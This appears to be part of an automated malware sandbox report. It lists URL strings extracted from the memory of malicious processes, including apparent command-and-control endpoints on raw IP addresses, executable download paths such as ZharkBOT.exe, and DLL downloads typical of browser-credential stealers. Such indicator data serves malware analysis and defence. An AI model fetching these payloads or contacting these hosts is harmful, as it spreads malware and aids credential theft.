                                Source: Hkbsse.exe, 00000017.00000002.4452507884.000000000099C000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000017.00000002.4452507884.000000000093C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.php
                                Source: Hkbsse.exe, 00000017.00000002.4452507884.000000000099C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.php;
                                Source: Hkbsse.exe, 00000017.00000002.4452507884.000000000099C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpQ
                                Source: Hkbsse.exe, 00000017.00000002.4452507884.000000000099C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpV
                                Source: Hkbsse.exe, 00000017.00000002.4452507884.000000000099C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpX
                                Source: Hkbsse.exe, 00000017.00000002.4452507884.000000000099C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpcatek
                                Source: Hkbsse.exe, 00000017.00000002.4452507884.000000000099C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpcoded
                                Source: Hkbsse.exe, 00000017.00000002.4452507884.000000000099C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpcodedQ
                                Source: Hkbsse.exe, 00000017.00000002.4452507884.000000000099C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpd
                                Source: Hkbsse.exe, 00000017.00000002.4452507884.000000000099C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpded
                                Source: Hkbsse.exe, 00000017.00000002.4452507884.000000000099C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpff913c5fc0b879a0d56e06
                                Source: Hkbsse.exe, 00000017.00000002.4452507884.000000000099C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpium
                                Source: Hkbsse.exe, 00000017.00000002.4452507884.000000000099C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpom1
                                Source: Hkbsse.exe, 00000017.00000002.4452507884.000000000099C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.116/Mb3GvQs8/index.phpq
                                Source: axplong.exe, 00000002.00000002.4458206583.00000000015FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.216.214.217/cdn-directory/gold543.exe
                                Source: axplong.exe, 00000002.00000002.4458206583.00000000015FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.216.214.217/cdn-directory/gold543.exe8
                                Source: axplong.exe, 00000002.00000002.4458206583.00000000015FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.216.214.217/cdn-directory/see.exe6
                                Source: axplong.exe, 00000002.00000002.4458206583.00000000015FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.216.214.217/cdn-directory/see.exez
                                Source: axplong.exe, 00000002.00000002.4458206583.00000000015FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.216.214.217/cdn-directory/wev233v22.exe
                                Source: axplong.exe, 00000002.00000002.4458206583.00000000015FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.216.214.217/cdn-directory/wev233v22.exe.
                                Source: axplong.exe, 00000002.00000002.4458206583.000000000164B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.216.214.217/cdn-directory/wev233v22.exeOH
                                Source: axplong.exe, 00000002.00000002.4458206583.00000000015FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.216.214.217/cdn-directory/wev233v22.exev
                                Source: axplong.exe, 00000002.00000002.4458206583.00000000015FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://43.153.49.49:8888/down/1qWbf4Bsej2u.exe
                                Source: axplong.exe, 00000002.00000002.4458206583.00000000015FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://43.153.49.49:8888/down/1qWbf4Bsej2u.exe2
                                Source: espartu.exe, 00000022.00000003.4102237144.0000000003A48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.232.41.
                                Source: espartu.exe, 00000022.00000002.4454469033.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, espartu.exe, 00000022.00000003.4110786691.0000000003A48000.00000004.00000020.00020000.00000000.sdmp, espartu.exe, 00000022.00000003.4047695499.0000000003A49000.00000004.00000020.00020000.00000000.sdmp, espartu.exe, 00000022.00000003.4065221598.0000000003A48000.00000004.00000020.00020000.00000000.sdmp, espartu.exe, 00000022.00000003.4056648030.0000000003A48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.232.41.110/2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6828
                                Source: axplong.exe, 00000002.00000003.3954231435.00000000013E5000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3952923426.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3953303483.00000000013DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.232.41.110/large/ZharkBOT.exe
                                Source: axplong.exe, 00000002.00000003.3952923426.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3953692208.00000000013D1000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4456563998.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.232.41.110/large/ZharkBOT.exelw
                                Source: axplong.exe, 00000002.00000003.3952923426.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3953692208.00000000013D1000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4456563998.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.232.41.110/large/ZharkBOT.exevw
                                Source: axplong.exe, 00000002.00000002.4458206583.00000000015FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.232.41.110/large/hello.exe
                                Source: axplong.exe, 00000002.00000003.3954231435.00000000013E5000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3952923426.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3953303483.00000000013DF000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4456859745.00000000013E2000.00000004.00000020.00020000.00000000.sdmp, espartu.exe, 00000022.00000002.4454469033.00000000011A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.232.41.110/large/see.exe
                                Source: espartu.exe, 00000022.00000002.4454469033.00000000011A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.232.41.110/large/see.exe9de
                                Source: espartu.exe, 00000022.00000002.4454469033.00000000011A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.232.41.110/large/see.exeOpiumEd1
                                Source: espartu.exe, 00000022.00000002.4454469033.00000000011A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.232.41.110/large/see.exelP
                                Source: espartu.exe, 00000022.00000002.4454469033.00000000011A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.232.41.110/large/see.exerP
                                Source: espartu.exe, 00000022.00000002.4454469033.0000000001157000.00000004.00000020.00020000.00000000.sdmp, espartu.exe, 00000022.00000002.4453169253.0000000000F7A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://77.232.41.110/large/svchost.exe
                                Source: espartu.exe, 00000022.00000002.4454469033.0000000001157000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.232.41.110/large/svchost.exe#1
                                Source: espartu.exe, 00000022.00000002.4454469033.0000000001157000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.232.41.110/large/svchost.exe:
                                Source: espartu.exe, 00000022.00000002.4454469033.0000000001157000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.232.41.110/large/svchost.exeB
                                Source: espartu.exe, 00000022.00000002.4454469033.0000000001157000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.232.41.110/large/svchost.exer
                                Source: espartu.exe, 00000022.00000002.4454469033.0000000001157000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.232.41.110/large/svchost.exet
                                Source: espartu.exe, 00000022.00000002.4454469033.0000000001157000.00000004.00000020.00020000.00000000.sdmp, espartu.exe, 00000022.00000002.4453169253.0000000000F7A000.00000004.00000010.00020000.00000000.sdmp, espartu.exe, 00000022.00000002.4454469033.00000000011A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.232.41.110:80/2v98n72/api.php
                                Source: espartu.exe, 00000022.00000002.4454469033.00000000011A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.232.41.110:80/2v98n72/api.php-M
                                Source: espartu.exe, 00000022.00000002.4454469033.00000000011A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.232.41.110:80/2v98n72/api.php?id=5B90D6690D158D030B8FA2EBCCB618CBB2D34C8951751EA133958B4E6
                                Source: espartu.exe, 00000022.00000002.4453169253.0000000000F7A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://77.232.41.110:80/2v98n72/api.phpOK0
                                Source: axplong.exe, 00000002.00000002.4458206583.00000000015FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/
                                Source: axplong.exe, 00000002.00000002.4458206583.00000000015FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/0
                                Source: axplong.exe, 00000002.00000002.4456859745.00000000013E2000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4456563998.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4458206583.00000000015EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.php
                                Source: axplong.exe, 00000002.00000002.4456563998.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.php&xI
                                Source: axplong.exe, 00000002.00000003.3954231435.00000000013E5000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3952923426.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3953303483.00000000013DF000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4456859745.00000000013E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.php00241001
                                Source: axplong.exe, 00000002.00000002.4456859745.00000000013E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.php2
                                Source: axplong.exe, 00000002.00000003.3952923426.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3953692208.00000000013D1000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4456563998.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.php4
                                Source: axplong.exe, 00000002.00000002.4456859745.00000000013E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.php43001
                                Source: axplong.exe, 00000002.00000002.4456563998.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.php9
                                Source: axplong.exe, 00000002.00000003.3954231435.00000000013E5000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3952923426.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3953303483.00000000013DF000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4456859745.00000000013E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.php:1c
                                Source: axplong.exe, 00000002.00000002.4456859745.00000000013E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpAppData
                                Source: axplong.exe, 00000002.00000002.4456859745.00000000013E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpAppDataB
                                Source: axplong.exe, 00000002.00000003.3954231435.00000000013E5000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3952923426.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3953303483.00000000013DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpD
                                Source: axplong.exe, 00000002.00000003.3954231435.00000000013E5000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3952923426.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3953303483.00000000013DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpData
                                Source: axplong.exe, 00000002.00000002.4456859745.00000000013E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpEscape
                                Source: axplong.exe, 00000002.00000002.4456859745.00000000013E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpK3U
                                Source: axplong.exe, 00000002.00000002.4456563998.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpMw
                                Source: axplong.exe, 00000002.00000002.4456563998.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpRx
                                Source: axplong.exe, 00000002.00000002.4456859745.00000000013E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpU3
                                Source: axplong.exe, 00000002.00000002.4456563998.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpWw
                                Source: axplong.exe, 00000002.00000002.4456859745.00000000013E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpZharkBOT.exe
                                Source: axplong.exe, 00000002.00000002.4456563998.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpZw
                                Source: axplong.exe, 00000002.00000002.4456859745.00000000013E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpata
                                Source: axplong.exe, 00000002.00000003.3952923426.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3953692208.00000000013D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpb9
                                Source: axplong.exe, 00000002.00000003.3952923426.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3953692208.00000000013D1000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4456563998.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpdx
                                Source: axplong.exe, 00000002.00000003.3954231435.00000000013E5000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3952923426.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3953303483.00000000013DF000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4456859745.00000000013E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpj1
                                Source: axplong.exe, 00000002.00000003.3954231435.00000000013E5000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3952923426.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3953303483.00000000013DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.phplF~n
                                Source: axplong.exe, 00000002.00000003.3953303483.00000000013DF000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4456859745.00000000013E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpsive.dll
                                Source: axplong.exe, 00000002.00000002.4456859745.00000000013E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.phptch
                                Source: axplong.exe, 00000002.00000002.4456859745.00000000013E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.phpyo2
                                Source: axplong.exe, 00000002.00000002.4456859745.00000000013E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Kiru9gu/index.php~
                                Source: axplong.exe, 00000002.00000002.4458206583.00000000015FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/Root
                                Source: axplong.exe, 00000002.00000002.4458206583.00000000015FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/lend/build16666.exe
                                Source: axplong.exe, 00000002.00000002.4458206583.00000000015FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/lend/build16666.exe0
                                Source: axplong.exe, 00000002.00000002.4458206583.00000000015C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/lend/leg222.exeRqu
                                Source: axplong.exe, 00000002.00000002.4458206583.00000000015C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/lend/leg222.exea~
                                Source: axplong.exe, 00000002.00000003.3954231435.00000000013E5000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3952923426.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3953303483.00000000013DF000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4456859745.00000000013E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/lend/newstart.exe
                                Source: axplong.exe, 00000002.00000003.3952923426.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3953692208.00000000013D1000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4456563998.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/lend/newstart.exe)xR
                                Source: axplong.exe, 00000002.00000003.3954231435.00000000013E5000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3952923426.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3953303483.00000000013DF000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4456859745.00000000013E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/lend/newstart.exe00240001
                                Source: axplong.exe, 00000002.00000003.3954231435.00000000013E5000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3952923426.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3953303483.00000000013DF000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4456859745.00000000013E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/lend/newstart.exe835a7ededB0H
                                Source: axplong.exe, 00000002.00000003.3954231435.00000000013E5000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3952923426.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3953303483.00000000013DF000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4456859745.00000000013E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/lend/newstart.exe835a7ef18b
                                Source: axplong.exe, 00000002.00000003.3954231435.00000000013E5000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3952923426.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3953303483.00000000013DF000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4456859745.00000000013E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/lend/newstart.exe835a7ef1a~
                                Source: axplong.exe, 00000002.00000003.3954231435.00000000013E5000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3952923426.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3953303483.00000000013DF000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4456859745.00000000013E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/lend/newstart.exe835ncoded-0m
                                Source: axplong.exe, 00000002.00000003.3952923426.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.3953692208.00000000013D1000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4456563998.00000000013D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/lend/newstart.exeHx
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.00000000032D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.0000000003317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/
                                Source: aspnet_regiis.exe, 00000014.00000003.2712771154.0000000003357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/570d5d5e8678366c.
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.0000000003317000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000014.00000002.2813138912.0000000003333000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000014.00000002.2811418680.000000000054A000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000014.00000003.2712771154.0000000003357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/570d5d5e8678366c.php
                                Source: aspnet_regiis.exe, 00000014.00000003.2712771154.0000000003357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/570d5d5e8678366c.php)
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.00000000033BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/570d5d5e8678366c.php3
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.0000000003317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/570d5d5e8678366c.php7t
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.0000000003317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/570d5d5e8678366c.php;ts
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.0000000003333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/570d5d5e8678366c.phpEdge
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.0000000003317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/570d5d5e8678366c.phpat
                                Source: aspnet_regiis.exe, 00000014.00000002.2811418680.000000000054A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/570d5d5e8678366c.phpe4f71d4e840f87f41c8118383ebc9f20
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.00000000033BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/570d5d5e8678366c.phpg
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.00000000033BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/570d5d5e8678366c.phpl
                                Source: aspnet_regiis.exe, 00000014.00000002.2811418680.0000000000448000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000014.00000002.2811418680.000000000054A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/570d5d5e8678366c.phposition:
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.00000000033BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/570d5d5e8678366c.phpq
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.00000000033BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/570d5d5e8678366c.phpt
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.0000000003317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/663cea891445d733/freebl3.dll
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.0000000003317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/663cea891445d733/freebl3.dll6g
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.0000000003317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/663cea891445d733/mozglue.dll
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.0000000003317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/663cea891445d733/mozglue.dll9g
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.0000000003317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/663cea891445d733/msvcp140.dll
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.0000000003317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/663cea891445d733/msvcp140.dllgr
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.0000000003317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/663cea891445d733/nss3.dll
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.0000000003317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/663cea891445d733/nss3.dllData
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.0000000003317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/663cea891445d733/nss3.dllll
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.0000000003317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/663cea891445d733/softokn3.dll
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.0000000003317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/663cea891445d733/sqlite3.dll
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.0000000003317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/663cea891445d733/sqlite3.dllix
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.0000000003333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/663cea891445d733/vcruntime140.dll
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.0000000003333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/663cea891445d733/vcruntime140.dllx5
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.00000000033BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/70d5d5e8678366c.php.
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.0000000003317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/Otg
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.0000000003317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70/St
                                Source: aspnet_regiis.exe, 00000014.00000002.2813138912.00000000032D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.70:
                                Source: svchost.exe, 0000000D.00000003.2247497831.0000027EC1779000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2247465289.0000027EC1776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4100754948.0000027EC1772000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4097757885.0000027EC1737000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4097288630.0000027EC1770000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4096986997.0000027EC176B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2237943833.0000027EC1774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS
                                Source: svchost.exe, 0000000D.00000003.2237943833.0000027EC1774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
